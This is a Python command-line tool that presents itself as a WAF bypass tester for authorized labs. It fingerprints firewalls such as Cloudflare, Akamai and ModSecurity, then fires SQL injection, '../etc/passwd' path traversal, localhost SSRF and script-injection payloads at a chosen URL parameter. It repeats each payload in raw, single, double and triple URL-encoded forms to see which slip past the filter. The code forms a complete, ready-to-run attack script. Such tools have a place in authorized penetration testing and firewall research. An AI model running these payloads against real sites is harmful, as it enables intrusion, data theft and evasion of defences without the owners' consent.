#!/usr/bin/env python3

import click
import requests
from urllib.parse import quote
from rich.console import Console
from rich.table import Table
from rich import print as rprint
import json
import time
import sys
import re

console = Console()

BANNER = r"""
                                  ░██    ░██                      ░██ 
                                  ░██                             ░██ 
 ░███████   ░███████  ░██░████ ░████████ ░██ ░███████   ░███████  ░██ 
░██    ░██ ░██    ░██ ░███        ░██    ░██░██        ░██    ░██ ░██ 
░██        ░██    ░██ ░██         ░██    ░██ ░███████  ░██    ░██ ░██ 
░██    ░██ ░██    ░██ ░██         ░██    ░██       ░██ ░██    ░██ ░██ 
 ░███████   ░███████  ░██          ░████ ░██ ░███████   ░███████  ░██ 

 by KL3FT3Z (https://github.com/toxy4ny)                                                            
                                                                      
 
"""

DESCRIPTION = "[bold cyan]WAF Bypass & Normalization Stress Tester[/]\n" \
              "[yellow]Lab Mode — Use only in authorized environments[/]"

WAF_SIGNATURES = [
    {
        "name": "Cloudflare",
        "checks": [
            lambda h, c: "cf-ray" in h,
            lambda h, c: h.get("server", "").lower() == "cloudflare",
            lambda h, c: "__cfduid" in h.get("set-cookie", ""),
        ],
    },
    {
        "name": "AWS WAF / CloudFront",
        "checks": [
            lambda h, c: "x-amz-cf-id" in h,
            lambda h, c: "server" in h and "awselb" in h["server"].lower(),
            lambda h, c: "x-cache" in h and "lambda" in h["x-cache"].lower(),
        ],
    },
    {
        "name": "Sucuri CloudProxy",
        "checks": [
            lambda h, c: "x-sucuri-id" in h,
            lambda h, c: "sucuri" in h.get("server", "").lower(),
        ],
    },
    {
        "name": "Imperva / Incapsula",
        "checks": [
            lambda h, c: "x-cdn" in h and "imperva" in h["x-cdn"].lower(),
            lambda h, c: "x-iinfo" in h,
            lambda h, c: "incident-id" in h,
        ],
    },
    {
        "name": "ModSecurity (generic)",
        "checks": [
            lambda h, c: "mod_security" in h.get("server", "").lower(),
            lambda h, c: "x-mod-sec" in h or "modsecurity" in h.get("server", "").lower(),
            lambda h, c: "403 forbidden" in c.lower() and "modsecurity" in c.lower(),
        ],
    },
    {
        "name": "Akamai",
        "checks": [
            lambda h, c: "akamai-origin-hop" in h,
            lambda h, c: any(k.startswith("x-akamai") for k in h.keys()),
        ],
    },
    {
        "name": "F5 BIG-IP ASM",
        "checks": [
            lambda h, c: "x-waf-event-info" in h,
            lambda h, c: "server" in h and "bigip" in h["server"].lower(),
        ],
    },
    {
        "name": "Wordfence",
        "checks": [
            lambda h, c: "x-wordfence" in h,
            lambda h, c: "generated by wordfence" in c.lower(),
        ],
    },
]

def detect_waf(headers, content=""):
    headers = {k.lower(): v for k, v in headers.items()}
    for waf in WAF_SIGNATURES:
        for check in waf["checks"]:
            try:
                if check(headers, content):
                    return waf["name"]
            except Exception:
                continue
    return "Unknown or No WAF Detected"

PAYLOADS = {
    "sqli": [
        "1' UNION SELECT 'test'--",
        "1' OR '1'='1'--",
        "1%2527%2520UNION%2520SELECT%2520%2527test%2527--",
    ],
    "lfi": [
        "../../../../etc/passwd",
        "..%2f..%2f..%2f..%2fetc%2fpasswd",
        "..%252f..%252f..%252f..%252fetc%252fpasswd",
    ],
    "ssrf": [
        "http://127.0.0.1:80",
        "127.0.0.1%253a80",
        "http%253a//localhost",
    ],
    "xss": [
        "<script>alert(1)</script>",
        "%3cscript%3ealert(1)%3c/script%3e",
        "%253cscript%253ealert(1)%253c/script%253e",
    ]
}

def double_encode(s):
    return quote(quote(s, safe=''), safe='')

def triple_encode(s):
    return quote(quote(quote(s, safe=''), safe=''), safe='')

def generate_variants(payload):
    return [
        payload,
        quote(payload, safe=''),
        double_encode(payload),
        triple_encode(payload),
    ]

def safe_request(url, headers=None, timeout=10):
    try:
        resp = requests.get(url, headers=headers or {}, timeout=timeout, verify=False)
        return resp.status_code, len(resp.content), dict(resp.headers), resp.text
    except Exception as e:
        return 0, 0, {}, f"Error: {str(e)}"

@click.command()
@click.option('--target', '-t', required=True, help='Target URL (e.g., https://api.example.com/endpoint)')
@click.option('--param', '-p', default='id', help='Parameter to inject (default: id)')
@click.option('--attack', '-a', type=click.Choice(['sqli', 'lfi', 'ssrf', 'xss']), default='sqli', help='Attack type')
@click.option('--output', '-o', help='Save results to JSONL file')
@click.option('--verbose', '-v', is_flag=True, help='Show full request URLs')
def scan(target, param, attack, output, verbose):
    
    console.clear()
    
    rprint(f"[bold red]{BANNER}[/]")
    rprint(DESCRIPTION + "\n")

    rprint(f"[cyan]Target:[/] {target}")
    rprint(f"[cyan]Param:[/] {param}")
    rprint(f"[cyan]Attack:[/] {attack.upper()}\n")

    if not target.startswith(('http://', 'https://')):
        rprint("[red]Error: Target must start with http:// or https://")
        sys.exit(1)

    base_url = target if '?' in target else target + '?'

    clean_url = f"{base_url}{param}=1"
    rprint(f"[gray]🔍 Probing for WAF...\n")
    status, size, headers, content = safe_request(clean_url)
    waf_name = detect_waf(headers, content)
    rprint(f"[bold blue]🛡️  Detected WAF:[/] [yellow]{waf_name}[/]\n")

    if status == 0:
        rprint("[red]Failed to reach target. Exiting.")
        sys.exit(1)

    results = []
    table = Table(show_header=True, header_style="bold magenta")
    table.add_column("Vector", style="dim")
    table.add_column("Encoding", justify="center")
    table.add_column("Status", justify="center")
    table.add_column("Size", justify="right")
    table.add_column("Diff?", justify="center")

    clean_status, clean_size = status, size

    for payload in PAYLOADS.get(attack, []):
        variants = generate_variants(payload)
        enc_labels = ["raw", "single", "double", "triple"]

        for var, label in zip(variants, enc_labels):
            test_url = f"{base_url}{param}={var}"
            if verbose:
                rprint(f"[dim]{test_url}[/dim]")

            status, size, _, _ = safe_request(test_url)
            is_diff = "✅" if status != clean_status or abs(size - clean_size) > 50 else "❌"

            table.add_row(var[:40] + ("..." if len(var) > 40 else ""), label, str(status), str(size), is_diff)

            results.append({
                "timestamp": time.time(),
                "target": target,
                "param": param,
                "attack": attack,
                "payload": var,
                "encoding": label,
                "status": status,
                "size": size,
                "diff": is_diff == "✅",
                "detected_waf": waf_name
            })

            time.sleep(0.2)

    console.print(table)

    if output:
        with open(output, 'w') as f:
            for r in results:
                f.write(json.dumps(r, ensure_ascii=False) + '\n')
        rprint(f"\n[green]Results saved to: {output}")

    rprint("\n[bold yellow]Note:[/] WAF detection is heuristic. Always confirm findings manually.")

if __name__ == '__main__':
    scan()